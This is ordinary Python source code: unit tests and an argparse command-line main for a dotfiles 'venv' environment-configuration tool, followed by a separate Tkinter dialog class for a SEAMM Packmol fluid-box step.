self.assertTrue(lookup('True'))
self.assertTrue(lookup('kwargsTrue'))
self.assertTrue(lookup('envTrue'))
self.assertEqual(lookup('collide'), 'kwargs')
self.assertIsNone(lookup('...'))
self.assertTrue(lookup('...', default=True))
class Test_100_Env(VenvTestCase, unittest.TestCase):
def test_010_Env(self):
e = Env()
self.assertTrue(e)
assert 'WORKON_HOME' not in e
e['WORKON_HOME'] = '~/-wrk/-ve27'
assert 'WORKON_HOME' in e
assert 'WORKON_HOME' in e.environ
def test_020_Env_copy(self):
e = Env()
keyname = '_test'
self.assertNotIn(keyname, e)
e[keyname] = True
self.assertIn(keyname, e)
e2 = e.copy()
self.assertIn(keyname, e2)
keyname = '_test2'
e2[keyname] = True
self.assertIn(keyname, e2)
self.assertNotIn(keyname, e)
def test_Env_from_environ(self):
import os
e = Env.from_environ(os.environ)
print(e)
self.assertTrue(e)
class Test_200_StepBuilder(VenvTestCase, unittest.TestCase):
def test_000_Step(self):
def build_func(env, **kwargs):
return env
s = Step(build_func)
self.assertTrue(s)
def test_500_StepBuilder(self):
env = Env()
env['_test'] = True
builder = StepBuilder()
step, new_env = builder.build(env=env)
self.assertTrue(new_env)
self.assertEqual(env.environ.items(), new_env.environ.items())
builder = StepBuilder()
step, new_env = builder.build(env=env)
self.assertTrue(new_env)
self.assertEqual(env, new_env)
def test_600_StepBuilder(self):
env = Env()
env['_test'] = True
builder = StepBuilder()
builder.add_step(PrintEnvStderrStep)
step, new_env = builder.build(env=env)
self.assertTrue(new_env)
self.assertEqual(env, new_env)
class Test_250_Venv(VenvTestCase, unittest.TestCase):
def setUp(self):
self.env = VenvTestUtils.build_env_test_fixture()
self.envattrs = ['VIRTUAL_ENV', 'VIRTUAL_ENV_NAME', '_APP',
'VENVSTR', 'VENVSTRAPP', 'VENVPREFIX']
def test_000_venv_test_fixture(self):
self.assertTrue(self.env)
for attr in self.envattrs:
self.assertIn(attr, self.env)
self.assertIn(attr, self.env.environ)
self.assertEqual(self.env.get(attr), self.env[attr])
def test_010_assert_venv_requires_VENVPREFIX__or__VIRTUAL_ENV(self):
with self.assertRaises(Exception):
venv = Venv()
def test_100_Venv_parse_VENVSTR_env__and__VENVSTR(self):
env = Venv.parse_VENVSTR(env=self.env, VENVSTR=self.env['VENVSTR'])
for attr in self.envattrs:
self.assertIn(attr, env)
self.assertEqual(env[attr], self.env.environ[attr])
self.assertEqual(env[attr], self.env[attr])
def test_110_Venv_parse_VENVSTR_VENVSTR(self):
env = Venv.parse_VENVSTR(VENVSTR=self.env['VENVSTR'])
for attr in self.envattrs:
self.assertIn(attr, env)
print(attr)
try:
self.assertEqual(env[attr], self.env[attr])
except:
print(attr)
raise
def test_110_Venv_parse_VENVSTR_VENVSTR(self):
env = Venv.parse_VENVSTR(VENVSTR=self.env['VENVSTR'])
for attr in self.envattrs:
try:
self.assertEqual(env[attr], self.env[attr])
except:
self.assertEqual(attr+'-'+env[attr], attr)
raise
def test_120_Venv_parse_VENVSTR_VENVSTR_VENVSTRAPP(self):
VENVSTRAPP = 'dotfiles/docs'
self.env = VenvTestUtils.build_env_test_fixture(
Env(VENVSTRAPP=VENVSTRAPP, _APP=VENVSTRAPP))
env = Venv.parse_VENVSTR(VENVSTR=self.env['VENVSTR'],
VENVSTRAPP=VENVSTRAPP)
for attr in self.envattrs:
self.assertIn(attr, env)
self.assertEqual(env[attr], self.env[attr])
self.assertEqual(env['_APP'], VENVSTRAPP)
self.assertEqual(env['VENVSTRAPP'], VENVSTRAPP)
class Test_300_venv_build_env(VenvTestCase, unittest.TestCase):
"""
test each build step independently
.. code:: python
kwargs = {}
env = env.copy()
buildfunc = build_virtualenvwrapper_env
new_env = buildfunc(env=env, **kwargs)
"""
def setUp(self):
self.env = VenvTestUtils.build_env_test_fixture()
@staticmethod
def print_(self, *args, **kwargs):
print(args, kwargs)
def test_100_build_dotfiles_env(self):
env = build_dotfiles_env()
self.print_(env)
self.assertTrue(env)
def test_200_build_usrlog_env(self):
env = build_usrlog_env()
self.print_(env)
self.assertTrue(env)
def test_400_build_virtualenvwrapper_env(self):
env = build_virtualenvwrapper_env()
self.print_(env)
self.assertTrue(env)
def test_500_build_conda_env(self):
env = build_conda_env()
self.print_(env)
self.assertTrue(env)
def test_600_build_conda_cfg_env(self):
env = build_conda_cfg_env()
#env = build_conda_cfg_env(env=env, conda_root=None, conda_home=None)
self.print_(env)
self.assertTrue(env)
def test_600_build_venv_paths_full_env__prefix_None(self):
with self.assertRaises(ConfigException):
env = build_venv_paths_full_env()
def test_610_build_venv_paths_full_env__prefix_root(self):
env = build_venv_paths_full_env(VENVPREFIX='/')
self.print_(env)
self.assertTrue(env)
self.assertEqual(env['_BIN'], '/bin')
self.assertEqual(env['_ETC'], '/etc')
self.assertEqual(env['_SRC'], '/src') # TODO
self.assertEqual(env['_LOG'], '/var/log')
# self.assertIn('WORKON_HOME', env)
def test_620_build_venv_paths_full_env__prefix_None(self):
env = build_venv_activate_env(VENVSTR=self.env["VENVSTR"])
env = build_venv_paths_full_env(env)
self.print_(env)
self.assertTrue(env)
self.assertIn('VIRTUAL_ENV', env)
self.assertEqual(env["VIRTUAL_ENV"], self.env["VIRTUAL_ENV"])
def test_650_build_venv_paths_cdalias_env(self):
env = build_venv_paths_cdalias_env()
self.print_(env)
self.assertTrue(env)
class Test_500_Venv(VenvTestCase, unittest.TestCase):
def setUp(self):
self.env = VenvTestUtils.build_env_test_fixture()
def test_000_venv(self):
self.assertTrue(self.env)
for attr in ['VENVSTR', 'VIRTUAL_ENV', 'VIRTUAL_ENV_NAME', '_APP']:
self.assertIn(attr, self.env)
with self.assertRaises(Exception):
venv = Venv()
def test_005_venv(self):
venv = Venv(VENVSTR=self.env['VENVSTR'])
self.assertTrue(venv)
self.assertTrue(venv.env)
print(venv.env)
for attr in ['VIRTUAL_ENV', 'VIRTUAL_ENV_NAME', '_APP']:
self.assertIn(attr, venv.env)
self.assertEqual(venv.env[attr], self.env[attr])
def test_010_venv__APP(self):
venv = Venv(VENVSTR=self.env['VIRTUAL_ENV'], _APP=self.env['_APP'])
self.assertIn('_APP', venv.env)
self.assertEqual(venv.env['_APP'], self.env['_APP'])
def test_011_venv__APP(self):
_APP = "dotfiles/docs"
VENVSTRAPP = "dotfiles/docs"
_env = Env(_APP=_APP)
self.assertEqual(_env['_APP'], _APP)
self.env = VenvTestUtils.build_env_test_fixture(_env)
self.assertEqual(self.env['_APP'], _APP)
venv = Venv(VENVSTR=self.env['VIRTUAL_ENV'],
_APP=_APP)
self.assertIn('_APP', venv.env)
self.assertEqual(venv.env['_APP'], self.env['_APP'])
self.assertEqual(venv.env['_WRD'],
joinpath(self.env['_SRC'], self.env['_APP']))
def test_020_venv_from_null_environ(self):
self.assertRaises(Exception, Venv)
def test_030_venv_without_environ(self):
os.environ['VIRTUAL_ENV'] = self.env['VIRTUAL_ENV']
with self.assertRaises(StepConfigException):
venv = Venv()
# Errors w/ travis: TODO XXX FIXME
#def test_040_venv_with_environ(self):
#os.environ['VIRTUAL_ENV'] = self.env['VIRTUAL_ENV']
#venv = Venv(from_environ=True)
#self.assertTrue(venv)
#self.assertEqual(venv.env['VIRTUAL_ENV'], self.env['VIRTUAL_ENV'])
def test_050_venv__VENVSTR__WORKON_HOME(self):
WORKON_HOME = '/WRKON_HOME'
venv = Venv(self.env['VENVSTR'], WORKON_HOME=WORKON_HOME)
self.assertTrue(venv)
self.assertEqual(venv.env['WORKON_HOME'], WORKON_HOME)
self.assertEqual(venv.env['_WRD'],
joinpath(WORKON_HOME,
self.env['VIRTUAL_ENV_NAME'],
'src',
self.env['VENVSTR']))
# TODO
# def test_060_venv__VENVSTR__WRK(self):
#__WRK = '/WRRK'
#venv = Venv(VENVSTR=self.env['VENVSTR'], __WRK=__WRK)
# self.assertTrue(venv)
#self.assertEqual(venv.env['__WRK'], __WRK)
# self.assertEqual(venv.env['_WRD'],
# joinpath(__WRK,
#'-ve27',
# self.env['VIRTUAL_ENV_NAME'],
#'src',
# self.env['VENVSTR']))
class Test_900_Venv_main(VenvTestCase, unittest.TestCase):
def setUp(self):
self.env = VenvTestUtils.build_env_test_fixture()
# wrap main as self.main on setup to always capture IO
# (output, stdout, stderr)
self.main = VenvTestUtils.capture_io(main)
def test_001_main_null(self):
#with self.assertRaises(SystemExit):
# retcode, stdout, stderr = self.main()
# self.assertEqual(retcode, 0)
pass
# calls SystemExit
# def test_002_main_help(self):
# retcode, stdout, stderr = self.main('-h')
# self.assertEqual(retcode, 0)
# retcode, stdout, stderr = self.main('--help')
# self.assertEqual(retcode, 0)
def test_100_main(self):
retcode, stdout, stderr = self.main('dotfiles')
self.assertEqual(retcode, 0)
retcode, stdout, stderr = self.main(
'--VIRTUAL_ENV', self.env['VIRTUAL_ENV'],
'--APP', self.env['_APP'])
self.assertEqual(retcode, 0)
retcode, stdout, stderr = self.main(
'--ve', 'dotfiles',
'--app', 'dotfiles')
self.assertEqual(retcode, 0)
def test_110_main_VENVSTR(self):
retcode, stdout, stderr = self.main('dotfiles')
self.assertEqual(retcode, 0)
retcode, stdout, stderr = self.main('dotfiles')
self.assertEqual(retcode, 0)
def test_120_main_print_bash_VENVSTR(self):
retcode, stdout, stderr = self.main(
'--print-vars',
self.env['VENVSTR'])
self.assertEqual(retcode, 0)
retcode, stdout, stderr = self.main(
'--print-vars',
'--compress',
self.env['VENVSTR'])
self.assertEqual(retcode, 0)
def test_130_main_print_bash_VENVSTR_VENVSTRAPP(self):
(retcode, stdout, stderr) = (self.main(
'--print-vars',
self.env['VENVSTR'],
self.env['_APP']))
self.assertEqual(retcode, 0)
def test_140_main_VENVSTR_WORKON_HOME(self):
retcode, stdout, stderr = self.main('--print-vars',
'--WORKON_HOME', '/WORKON_HOME',
self.env['VENVSTR'])
self.assertEqual(retcode, 0)
def test_200_main_print_bash_VENVSTR__APP(self):
retcode, stdout, stderr = self.main(
'--print-bash',
self.env['VENVSTR'],
self.env['_APP'])
self.assertEqual(retcode, 0)
def test_200_main_print_bash(self):
retcode, stdout, stderr = self.main('dotfiles', '--print-bash')
self.assertEqual(retcode, 0)
def test_210_main_print_bash_aliases(self):
retcode, stdout, stderr = self.main('dotfiles', '--print-bash-aliases')
self.assertEqual(retcode, 0)
def test_220_main_print_bash_cdaliases(self):
retcode, stdout, stderr = self.main('dotfiles', '--print-bash-cdaliases')
self.assertEqual(retcode, 0)
def test_300_main_print_zsh(self):
retcode, stdout, stderr = self.main('dotfiles', '--print-zsh')
self.assertEqual(retcode, 0)
def test_300_main_print_zsh(self):
retcode, stdout, stderr = self.main('dotfiles', '--print-zsh-cdalias')
self.assertEqual(retcode, 0)
def test_400_main_print_vim(self):
retcode, stdout, stderr = self.main('dotfiles', '--print-vim-cdalias')
self.assertEqual(retcode, 0)
# optparse.OptionParser
def build_venv_arg_parser():
"""
Returns:
optparse.OptionParser: options for the commandline interface
"""
import argparse
stdargs = argparse.ArgumentParser(add_help=False)
prs = argparse.ArgumentParser(
prog="venv",
#usage=("%prog [-b|--print-bash] [-t] [-e] [-E<virtualenv>] [appname]"),
description=(
"venv is a configuration utility for virtual environments."),
epilog=(
"argparse.REMAINDER: "
"If args must be specified, either (VENVSTR AND VENVSTRAPP) "
"or (--ve [--app]) "
"must be specified first: venv --ve dotfiles -xmake."),
parents=[stdargs],
)
stdprs = prs
stdprs.add_argument('-V', '--version',
dest='version',
action='store_true',)
stdprs.add_argument('-v', '--verbose',
dest='verbose',
action='append_const',
const=1)
stdprs.add_argument('-D', '--diff', '--show-diffs',
dest='show_diffs',
action='store_true',)
stdprs.add_argument('-T', '--trace',
dest='trace',
action='store_true',)
stdprs.add_argument('-q', '--quiet',
dest='quiet',
action='store_true',)
stdprs.add_argument('-t', '--test',
dest='run_tests',
action='store_true',)
prs.add_argument('--platform',
help='Platform string (default: None)',
dest='platform',
action='store',
default=None,
)
envprs = prs
envprs.add_argument('-e', '--from-environ',
help="Build venv.env.environ from keys in os.environ",
dest='from_environ',
action='store_true',
)
envprs.add_argument('--__WRK', '--WRK', '--wrk',
help="Path to workspace -- ~/-wrk",
dest='__WRK',
nargs='?',
action='store',
)
envprs.add_argument('--__DOTFILES', '--DOTFILES', '--dotfiles',
help="Path to ${__DOTFILES} symlink -- ~/-dotfiles",
dest='__DOTFILES',
nargs='?',
action='store',
)
envprs.add_argument('--WORKON_HOME', '--workonhome', '--wh',
help=("Path to ${WORKON_HOME} directory "
"containing VIRTUAL_ENVs"),
dest='WORKON_HOME',
nargs='?',
action='store',
)
envprs.add_argument('--CONDA_ROOT', '--condaroot', '--cr',
help=("Path to ${CONDA_ROOT} directory "
"containing VIRTUAL_ENVs"),
dest='CONDA_ROOT',
nargs='?',
action='store',
)
envprs.add_argument('--CONDA_ENVS_PATH', '--condaenvs', '--ce',
help=("Path to ${CONDA_ENVS_PATH} directory "
"containing VIRTUAL_ENVs"),
dest='CONDA_ENVS_PATH',
nargs='?',
action='store',
)
envprs.add_argument('--VENVSTR', '--venvstr', '--ve',
help=("Path to VIRTUAL_ENV -- "
"${WORKON_HOME}/${VIRTUAL_ENV_NAME} "
"(or a dirname in $WORKON_HOME) "),
dest='VENVSTR_',
nargs='?',
action='store')
envprs.add_argument('--VENVSTRAPP', '--venvstrapp',
help=("Subpath within {VIRTUAL_ETC}/src/"),
dest='VENVSTRAPP_',
nargs='?',
action='store')
envprs.add_argument('--VIRTUAL_ENV_NAME', '--virtual-env-name', '--vename',
help=("dirname in WORKON_HOME -- "
"${WORKON_HOME}/${VIRTUAL_ENV_NAME}"),
dest='VIRTUAL_ENV_NAME',
nargs='?',
action='store',
)
envprs.add_argument('--VENVPREFIX', '--venvprefix', '--prefix',
help='Prefix for _SRC, _ETC, _WRD if [ -z VIRTUAL_ENV ]',
dest='VENVPREFIX',
nargs='?',
action='store')
envprs.add_argument('--VIRTUAL_ENV', '--virtual-env',
help="Path to a $VIRTUAL_ENV",
dest='VIRTUAL_ENV',
nargs='?',
action='store',
)
envprs.add_argument('--_SRC', '--SRC', '--src',
help='Path to source -- ${VIRTUAL_ENV}/src")',
dest='_SRC',
nargs='?',
action='store',
)
envprs.add_argument('--_APP', '--APP', '--app', # see also: --VENVSTRAPP
help="Path component string -- ${_SRC}/${_APP}",
dest='_APP',
nargs='?',
action='store',
)
envprs.add_argument('--_WRD', '--WRD', '--wrd',
help="Path to working directory -- ${_SRC}/${_APP}",
dest='_WRD',
nargs='?',
action='store',
)
prnprs = prs
prs.add_argument('--print-json',
help="Print venv configuration as JSON",
dest='print_json',
action='store_true',
)
prs.add_argument('--print-json-filename',
help="Path to write venv env JSON to",
dest='print_json_filename',
nargs='?',
action='store',
default='venv.json',
)
prs.add_argument('--print-vars', '--vars',
help='Print vars',
dest='print_vars',
# nargs='?',
action='store_true',
default=None,
)
prs.add_argument('--print-bash', '--bash',
help="Print Bash shell configuration",
dest='print_bash',
action='store_true',
default=None,
# default='venv.bash.sh',
)
prs.add_argument('--print-bash-all',
help="Print Bash shell environ and aliases",
dest='print_bash_all',
action='store_true',
default=None,
# default='venv.bash.sh',
)
prs.add_argument('--print-bash-aliases', '--bash-alias',
help="Print Bash alias script",
dest='print_bash_aliases',
action='store_true',
)
prs.add_argument('--print-bash-cdaliases', '--bash-cdalias',
help="Print Bash cdalias script",
dest='print_bash_cdaliases',
action='store_true',
)
prs.add_argument('-Z', '--print-zsh',
help="Print ZSH shell configuration",
dest='print_zsh',
action='store_true',
)
prs.add_argument('--print-vim-cdalias', '--vim',
help="Print vimscript configuration ",
dest='print_vim_cdalias',
action='store_true',
)
prs.add_argument('--print-ipython-magics',
help="Print IPython magic methods",
dest="print_venv_ipymagics",
action='store_true',)
prs.add_argument('--command', '--cmd', '-x',
help="Run a command in a venv-configured shell",
dest='run_command',
action='store',
)
prs.add_argument('--run-bash', '--xbash', '-xb',
help="Run bash in the specified venv",
dest='run_bash',
action='store_true',
)
prs.add_argument('--run-make', '--xmake', '-xmake',
help="Run (cd $_WRD; make $@) in the specified venv",
dest='run_make',
action='store_true',
)
prs.add_argument('--run-editp', '--open-editors', '--edit', '-E',
help=("Open $EDITOR_ with venv.project_files"
" [$PROJECT_FILES]"),
dest='open_editors',
action='store_true',
default=False,
)
prs.add_argument('--run-terminal', '--open-terminals', '--terminals', '--terms',
help="Open terminals within the venv [gnome-terminal]",
dest='open_terminals',
action='store_true',
default=False,
)
#subparsers = prs.add_subparsers(help='subcommands')
#pthprs = subparsers.add_parser('path', help='see: $0 path --help')
pthprs = prs
pthprs.add_argument('--pall', '--pathall',
help="Print possible paths for the given path",
dest="all_paths",
action='store_true',
)
pthprs.add_argument('--pwrk', '--wrk-path',
help="Print $__WRK/$@",
dest="path__WRK",
action='store_true',
)
pthprs.add_argument('--pworkonhome', '--workonhome-path', '--pwh',
help="Print $__WORKON_HOME/$@",
dest="path_WORKON_HOME",
action='store_true',
)
pthprs.add_argument('--pvirtualenv', '--virtualenv-path', '--pv',
help="Print $VIRTUAL_ENV/${@}",
dest='path_VIRTUAL_ENV',
action='store_true',
)
pthprs.add_argument('--psrc', '--src-path', '--ps',
help="Print $_SRC/${@}",
dest='path__SRC',
action='store_true',
)
pthprs.add_argument('--pwrd', '--wrd-path', '--pw',
help="Print $_WRD/${@}",
dest='path__WRD',
action='store_true',
)
pthprs.add_argument('--pdotfiles', '--dotfiles-path', '--pd',
help="Print ${__DOTFILES}/${path}",
dest='path__DOTFILES',
action='store_true',
)
pthprs.add_argument('--prel', '--relative-path',
help="Print ${@}",
dest='relative_path',
action='store_true',
)
pthprs.add_argument('--pkg-resource-path',
help="Path from pkg_resources.TODOTODO",
dest="pkg_resource_path",
action='store_true',
)
pthprs.add_argument('--compress', '--compress-paths',
dest='compress_paths',
help='Path $VAR-ify the given paths from stdin',
action='store_true')
prs.add_argument('VENVSTR',
help=(
'a name of a virtualenv in WORKON_HOME '
'OR a full path to a VIRTUAL_ENV'),
nargs='?',
action='store',
)
prs.add_argument('VENVSTRAPP',
help="a path within _SRC (_WRD=_SRC/VENVSTRAPP)",
nargs='?',
action='store',
)
# Store remaining args in a catchall list (opts.args)
prs.add_argument('args', metavar='args', nargs=argparse.REMAINDER)
return prs
def comment_comment(strblock, **kwargs):
"""
Args:
strblock (str): string block (possibly containing newlines)
Keyword Arguments:
kwargs (dict): kwargs for prepend_comment_char
Returns:
str: string with each line prefixed with comment char
"""
return u'\n'.join(
prepend_comment_char(pprint.pformat(strblock), **kwargs))
def main(*argv, **kwargs):
"""
main function called if ``__name__=="__main__"``
Returns:
int: nonzero on error
"""
stderr = kwargs.get('stderr', sys.stderr)
stdout = kwargs.get('stdout', sys.stdout)
prs = build_venv_arg_parser()
if not argv:
_argv = sys.argv[1:]
else:
_argv = list(argv)
opts = prs.parse_args(args=_argv)
_, args = prs.parse_known_args(argv)
# opts.args
if not _argv and IN_IPYTHON:
opts.from_environ = True
if (not opts.quiet) or (not opts.version):
logging.basicConfig(
format="%(levelname)-6s %(message)s",
)
log = logging.getLogger(LOGNAME)
if opts.verbose:
log.setLevel(logging.DEBUG)
else:
log.setLevel(logging.INFO) # DEFAULT
if opts.quiet:
log = logging.getLogger(LOGNAME)
log.setLevel(logging.ERROR)
if opts.trace:
global DEBUG_TRACE_MODPATH
DEBUG_TRACE_MODPATH = opts.trace
logevent('main()',
{"sys.argv": sys.argv,
"*argv": argv,
"_argv": _argv,
"args": args,
"opts": opts.__dict__},
level=logging.DEBUG)
if opts.run_tests:
sys.argv = [sys.argv[0]] + opts.args
sys.exit(unittest.main())
if opts.version:
# TODO: independently __version__ this standalone script
# and version-stamp --print-[...]
try:
import dotfiles
version = dotfiles.version
print(version, file=stdout)
return 0
except ImportError:
return 127
# build or create a new Env
if opts.from_environ:
env = Env.from_environ(os.environ, verbose=opts.verbose)
else:
env = Env()
# read variables from options into the initial env dict
varnames = ['__WRK', '__DOTFILES', 'WORKON_HOME',
'VENVSTR', 'VENVSTRAPP', 'VENVPREFIX',
'VIRTUAL_ENV_NAME', 'VIRTUAL_ENV', '_SRC', '_WRD',
'CONDA_ROOT', 'CONDA_ENVS_PATH',
'CONDA_ENVS_DEFAULT', 'CONDA_ROOT_DEFAULT']
# get opts from args and update env
for varname in varnames:
value = getattr(opts, varname, None)
if value is not None:
existing_value = env.get(varname)
if existing_value is not None and existing_value != value:
logevent('main args', {
'msg': 'commandline options intersect with env',
'varname': varname,
'value': value,
'value_was': existing_value,
}, level=logging.DEBUG)
env[varname] = value
if opts.VENVSTR_:
env['VENVSTR'] = opts.VENVSTR_
if opts.VENVSTRAPP_:
env['VENVSTRAPP'] = opts.VENVSTRAPP_
logevent('main_env', env, wrap=True, level=logging.DEBUG)
if not any((
env.get('VENVPREFIX'),
env.get('VIRTUAL_ENV'),
env.get('VENVSTR'),
opts.from_environ)):
errmsg = ("You must specify one of VENVSTR, VIRTUAL_ENV, VENVPREFIX, "
"or -e|--from-environ")
prs.error(errmsg)
# TODO: handle paths
# virtualenv [, appname]
venv = Venv(env=env,
open_editors=opts.open_editors,
open_terminals=opts.open_terminals,
show_diffs=opts.show_diffs,
debug=opts.verbose,
)
output = stdout
print_cmd_opts = (opts.print_json,
opts.print_vars,
opts.print_bash,
opts.print_bash_aliases,
opts.print_bash_cdaliases,
opts.print_bash_all,
opts.print_zsh,
opts.print_vim_cdalias,
opts.print_venv_ipymagics
)
print_cmd = any(print_cmd_opts)
if opts.print_vars:
if False: # TODO: any(print_cmd_opts):
prs.error("--print-vars specfied when\n"
"writing to json, bash, zsh, or vim.")
else:
for block in venv.generate_vars_env(
compress_paths=opts.compress_paths):
print(block, file=output)
if opts.print_json:
print(venv.to_json(indent=4), file=output)
if opts.print_bash_all:
for block in venv.generate_bash_env(compress_paths=opts.compress_paths,
include_paths=True,
include_aliases=True):
print(block, file=output)
if opts.print_bash:
for block in venv.generate_bash_env(compress_paths=opts.compress_paths,
include_paths=True,
include_aliases=False):
print(block, file=output)
if opts.print_bash_aliases:
for block in venv.generate_bash_env(compress_paths=opts.compress_paths,
include_paths=False,
include_aliases=True,
include_cdaliases=True):
print(block, file=output)
if opts.print_bash_cdaliases:
for block in venv.generate_bash_cdalias():
print(block, file=output)
if opts.print_vim_cdalias:
for block in venv.generate_vim_cdalias():
print(block, file=output)
if opts.print_venv_ipymagics:
for block in venv.generate_venv_ipymagics():
print(block, file=output)
if opts.run_command:
prcs = venv.call(opts.run_command)
if opts.run_bash:
prcs = venv.call('cd $_WRD; bash')
if opts.run_make:
args = []
argstr = " ".join(opts.args)
prcs = venv.call('cd $_WRD; make {}'.format(argstr))
def get_pkg_resource_filename(filename):
import pkg_resources
return pkg_resources.resource_filename('dotfiles', filename)
if any((opts.all_paths,
# TODO TODO TODO:
# is there a way to
# distinguish between unset and flag-specified-without-value
# with argparse nargs='?'?
opts.path__WRD,
opts.path__DOTFILES,
opts.relative_path,
opts.pkg_resource_path)):
paths = []
VENVSTR = env.get('VENVSTR')
if VENVSTR:
paths.append(VENVSTR)
VENVSTRAPP = env.get('VENVSTRAPP')
if VENVSTRAPP:
paths.append(VENVSTRAPP)
paths.extend(args)
basepath = get_pkg_resource_filename('/')
if opts.all_paths or opts.path__DOTFILES is not None:
__DOTFILES = env.get('__DOTFILES',
os.path.join('~', '-dotfiles'))
env['__DOTFILES'] = __DOTFILES
for pth in paths:
resource_path = get_pkg_resource_filename(pth)
if opts.all_paths or opts.relative_path:
relpath = os.path.relpath(resource_path, basepath)
print(relpath, file=stdout)
if opts.all_paths or opts.pkg_resource_path:
print(resource_path, file=stdout)
if opts.all_paths or opts.path__DOTFILES is not None:
dotfiles_path = os.path.join(env['__DOTFILES'], pth)
print(dotfiles_path, file=stdout)
if not print_cmd and opts.compress_paths:
stdin = sys.stdin
for l in stdin:
pathstr = l.rstrip()
#print(pathstr)
output = venv.env.compress_paths(pathstr)
print(output, file=stdout)
return 0
if __name__ == "__main__":
retcode = main(*sys.argv[1:])
if not IN_IPYTHON:
sys.exit(retcode)
else:
if IN_IPYTHON_CONFIG:
logevent("ipython_main", "configuring IPython")
ipython_main()
| StarcoderdataPython |
4806033 | # -*- coding: utf-8 -*-
"""The graphical part of a Packmol step"""
import logging
import tkinter as tk
import tkinter.ttk as ttk
from packmol_step import PackmolParameters
import seamm
import seamm_widgets as sw
logger = logging.getLogger(__name__)
class TkPackmol(seamm.TkNode):
"""Graphical interface for using Packmol for fluid boxes"""
def __init__(
self, tk_flowchart=None, node=None, canvas=None, x=None, y=None, w=200, h=50
):
"""Initialize a node
Keyword arguments:
"""
self.dialog = None
self._molecule_data = []
self._add_molecule = None
super().__init__(
tk_flowchart=tk_flowchart, node=node, canvas=canvas, x=x, y=y, w=w, h=h
)
def create_dialog(self):
"""Create the dialog!"""
frame = super().create_dialog(title="Edit PACKMOL parameters")
# Create all the widgets
P = self.node.parameters
for key in P:
if key not in ("molecules",):
self[key] = P[key].widget(frame)
# Frame for specifying molecules
self["molecules"] = sw.ScrolledFrame(frame, height=500)
w = self["molecules"].interior()
self["component"] = ttk.Label(w, text="Component")
self["source"] = ttk.Label(w, text="Source")
self["definition"] = ttk.Label(w, text="Definition")
self["stoichiometry"] = ttk.Label(w, text="proportion")
# And the molecule data
for molecule in P["molecules"].value:
self._molecule_data.append({**molecule})
for key in ("periodic", "shape", "dimensions", "fluid amount"):
self[key].combobox.bind("<<ComboboxSelected>>", self.reset_dialog)
self[key].combobox.bind("<Return>", self.reset_dialog)
self[key].combobox.bind("<FocusOut>", self.reset_dialog)
self.reset_dialog()
# Resize the dialog to fill the screen, more or less.
self.fit_dialog()
def reset_dialog(self, widget=None):
"""Layout the widgets in the dialog contingent on the parameter values."""
frame = self["frame"]
# Reset everything
columns, rows = frame.grid_size()
for col in range(columns):
frame.grid_columnconfigure(col, weight=0, minsize=0)
for row in range(rows):
frame.grid_rowconfigure(row, weight=0, minsize=0)
for slave in frame.grid_slaves():
slave.grid_forget()
# The possible shapes depend on the periodicity
periodic = self["periodic"].get()
shape = self["shape"].get()
if periodic == "Yes":
shapes = PackmolParameters.periodic_shapes
else:
shapes = PackmolParameters.shapes
self["shape"].combobox.config(values=shapes)
if shape not in shapes:
shape = shapes[0]
self["shape"].set(shape)
# The dimensions control the remaining widgets
dimensions = self["dimensions"].get()
widgets = []
row = 0
for key in ("periodic", "shape", "dimensions"):
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
if dimensions == "given explicitly":
if shape == "cubic":
keys = ("edge length",)
elif shape == "rectangular":
keys = ("a", "b", "c")
elif shape == "spherical":
keys = ("diameter",)
else:
raise RuntimeError(f"Do not recognize shape '{shape}'")
for key in keys:
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
elif dimensions == "calculated from the volume":
if shape == "rectangular":
keys = ("volume", "a_ratio", "b_ratio", "c_ratio")
else:
keys = ("volume",)
for key in keys:
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
elif dimensions == "calculated from the solute dimensions":
keys = ("solvent thickness",)
for key in keys:
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
elif dimensions == "calculated from the density":
if shape == "rectangular":
keys = ("density", "a_ratio", "b_ratio", "c_ratio")
else:
keys = ("density",)
for key in keys:
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
elif dimensions == "calculated using the Ideal Gas Law":
if shape == "rectangular":
keys = ("temperature", "pressure", "a_ratio", "b_ratio", "c_ratio")
else:
keys = ("temperature", "pressure")
for key in keys:
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
else:
raise RuntimeError(f"Do not recognize dimensions '{dimensions}'")
# Next we need the amount of material. However the options change depending on
# the above
amount = self["fluid amount"].get()
if dimensions in (
"calculated from the density",
"calculated using the Ideal Gas Law",
):
amounts = PackmolParameters.amounts_for_density
elif dimensions in ("calculated from the solute dimensions",):
amounts = PackmolParameters.amounts_for_layer
else:
amounts = PackmolParameters.amounts
self["fluid amount"].combobox.config(values=amounts)
if amount not in amounts:
amount = amounts[0]
self["fluid amount"].set(amount)
for key in ("fluid amount",):
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
if amount == "rounding this number of atoms":
for key in ("approximate number of atoms",):
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
elif amount == "rounding this number of molecules":
for key in ("approximate number of molecules",):
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
elif amount == "using the density":
for key in ("density",):
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
elif amount == "using the Ideal Gas Law":
for key in ("temperature", "pressure"):
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
else:
raise RuntimeError(f"Do not recognize amount '{amount}'")
sw.align_labels(widgets, sticky=tk.E)
# The table of molecules to use
self["molecules"].grid(row=row, column=0, columnspan=2, sticky=tk.NSEW)
frame.grid_rowconfigure(row, weight=1, minsize=100)
frame.grid_columnconfigure(1, weight=1)
row += 1
self.reset_molecules()
# And finally, where to put the new system
widgets = []
for key in ("structure handling", "system name", "configuration name"):
self[key].grid(row=row, column=0, sticky=tk.EW)
row += 1
widgets.append(self[key])
sw.align_labels(widgets, sticky=tk.E)
def reset_molecules(self):
"""Layout the table of molecules to use."""
frame = self["molecules"].interior()
# Unpack any widgets
for slave in frame.grid_slaves():
slave.grid_forget()
# Put in the column headers.
row = 0
self["component"].grid(row=row, column=1, sticky=tk.EW)
self["source"].grid(row=row, column=2, sticky=tk.EW)
self["definition"].grid(row=row, column=3, sticky=tk.EW)
self["stoichiometry"].grid(row=row, column=4, sticky=tk.EW)
row += 1
